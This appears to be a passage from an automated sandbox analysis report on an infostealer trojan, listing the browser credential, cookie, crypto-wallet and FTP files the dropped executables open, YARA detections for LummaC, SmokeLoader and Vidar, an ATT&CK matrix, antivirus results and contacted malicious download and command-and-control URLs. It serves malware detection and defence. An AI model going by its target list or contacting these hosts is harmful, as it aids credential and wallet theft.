Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\455F.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR

Source: Yara match	File source: Process Memory Space: build2.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 455F.exe PID: 3688, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 455F.exe PID: 3688, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1443196159.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1443235226.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1682396136.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1682358139.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 18.2.build2.exe.a015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.build2.exe.a015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2287228950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1803333267.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 2636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7712, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	2 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Scheduled Task/Job	612 Process Injection	2 Software Packing	1 Credentials in Registry	13 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Exploitation for Client Execution	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	145 System Information Discovery	Distributed Component Object Model	1 Credential API Hooking	125 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	13 Command and Scripting Interpreter	1 Services File Permissions Weakness	1 Registry Run Keys / Startup Folder	1 File Deletion	LSA Secrets	681 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 Scheduled Task/Job	RC Scripts	1 Services File Permissions Weakness	11 Masquerading	Cached Domain Credentials	241 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	1 PowerShell	Startup Items	Startup Items	1 Modify Registry	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Services File Permissions Weakness	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	39%	ReversingLabs	Win32.Trojan.Generic
SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	100%	Avira	HEUR/AGEN.1316639
SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\1601.exe	100%	Avira	HEUR/AGEN.1316639
C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	100%	Avira	HEUR/AGEN.1313018
C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	100%	Avira	HEUR/AGEN.1316639
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build2[1].exe	100%	Avira	HEUR/AGEN.1313018
C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	100%	Avira	TR/AD.MalwareCrypter.llbpm
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build3[1].exe	100%	Avira	TR/AD.MalwareCrypter.llbpm
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	100%	Avira	TR/AD.MalwareCrypter.llbpm
C:\Users\user\AppData\Local\Temp\1601.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build3[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	81%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	87%	ReversingLabs	Win32.Trojan.Azorult
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\sqln[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build2[1].exe	81%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build3[1].exe	87%	ReversingLabs	Win32.Trojan.Azorult
C:\Users\user\AppData\Local\Temp\455F.exe	92%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	87%	ReversingLabs	Win32.Trojan.Azorult
C:\Users\user\AppData\Roaming\fcbhtea	39%	ReversingLabs	Win32.Packed.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
technologyenterdo.shop	0%	URL Reputation	safe
problemregardybuiwo.fun	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://95.216.179.73/softokn3.dllN	0%	Avira URL Cloud	safe
http://sajdfue.com/test1/get.php	100%	Avira URL Cloud	malware
https://95.216.179.73/	0%	Avira URL Cloud	safe
https://outlook.comy	0%	Avira URL Cloud	safe
https://95.216.179.73;	0%	Avira URL Cloud	safe
http://sajdfue.com/files/1/build3.exerun381	100%	Avira URL Cloud	malware
https://www.gstatic.cn/recaptcha/	0%	Avira URL Cloud	safe
https://95.216.179.73/.com	0%	Avira URL Cloud	safe
http://trade-inmyus.com/index.php	100%	Avira URL Cloud	malware
https://95.216.179.73/mozglue.dll	0%	Avira URL Cloud	safe
http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD&first=trueL3V9	100%	Avira URL Cloud	malware
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://95.216.179.73/amData	0%	Avira URL Cloud	safe
https://95.216.179.73/ocal	0%	Avira URL Cloud	safe
https://95.216.179.73/softokn3.dllb	0%	Avira URL Cloud	safe
http://ns.micr9	0%	Avira URL Cloud	safe
http://sdfjhuz.com/dl/build2.exe$run	100%	Avira URL Cloud	malware
https://95.216.179.73/$/B	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
https://resergvearyinitiani.shop/lc	100%	Avira URL Cloud	malware
https://95.216.179.73Local	0%	Avira URL Cloud	safe
https://lv.queniujq.cn	0%	Avira URL Cloud	safe
http://sajdfue.com/files/1/build3.exe$run	100%	Avira URL Cloud	malware
https://95.216.179.73/freebl3.dll	0%	Avira URL Cloud	safe
http://sajdfue.com/files/1/build3.exe	100%	Avira URL Cloud	malware
https://95.216.179.73/&w	0%	Avira URL Cloud	safe
http://sajdfue.com/test1/get.phpy	100%	Avira URL Cloud	malware
https://95.216.179.73/vcruntime140.dllV	0%	Avira URL Cloud	safe
https://95.216.179.73	0%	Avira URL Cloud	safe
https://95.216.179.73/curity	0%	Avira URL Cloud	safe
http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD	100%	Avira URL Cloud	malware
http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDDE	100%	Avira URL Cloud	malware
https://95.216.179.73/nss3.dllK	0%	Avira URL Cloud	safe
https://recaptcha.net/recaptcha/;	0%	Avira URL Cloud	safe
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	0%	Avira URL Cloud	safe
https://resergvearyinitiani.shop/-	100%	Avira URL Cloud	malware
https://broadcast.st.dl.eccdnx.com	0%	Avira URL Cloud	safe
https://powerpoint.office.comcemberZ	0%	Avira URL Cloud	safe
https://95.216.179.73/nss3.dll6	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
resergvearyinitiani.shop	172.67.217.100	true	true	unknown
sdfjhuz.com	190.249.187.165	true	true	unknown
sajdfue.com	189.195.132.134	true	true	unknown
m2reg.ulm.ac.id	103.23.232.80	true	true	unknown
steamcommunity.com	23.47.27.74	true	false	high
nessotechbd.com	192.185.16.114	true	true	unknown
cdn.discordapp.com	162.159.133.233	true	false	high
api.2ip.ua	104.21.65.24	true	false	high
drive.google.com	142.250.217.238	true	false	high
trad-einmyus.com	193.106.175.76	true	true	unknown
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://trade-inmyus.com/index.php	true	Avira URL Cloud: malware	unknown
http://sajdfue.com/test1/get.php	true	Avira URL Cloud: malware	unknown
https://95.216.179.73/	false	Avira URL Cloud: safe	unknown
https://95.216.179.73/mozglue.dll	false	Avira URL Cloud: safe	unknown
technologyenterdo.shop	true	URL Reputation: safe	unknown
http://sajdfue.com/files/1/build3.exe	true	Avira URL Cloud: malware	unknown
https://95.216.179.73/freebl3.dll	false	Avira URL Cloud: safe	unknown
problemregardybuiwo.fun	true	URL Reputation: safe	unknown
http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://95.216.179.73/.com	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	false		high
